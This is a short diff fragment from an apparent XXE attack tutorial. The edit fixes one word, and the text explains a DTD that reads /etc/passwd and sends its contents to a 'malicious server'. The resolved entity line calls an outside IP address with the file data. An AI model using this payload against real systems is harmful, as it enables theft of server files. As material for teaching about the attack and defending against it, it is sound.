Play XML Entities

 %p2;

-This DTD will force the XML parser to read the content of /etc/passwd and assigned it to the variable p1.
+This DTD will force the XML parser to read the content of /etc/passwd and assign it to the variable p1.
 Then it will create another variable p2 that contains a link to your malicious server and the value of p1.
 Then it will print the value of p2 using the %p2.
 After parsing the DTD will look like:

 <!ENTITY e1 SYSTEM 'http://192.168.159.1:3001/BLAH?[/etc/passwd]'>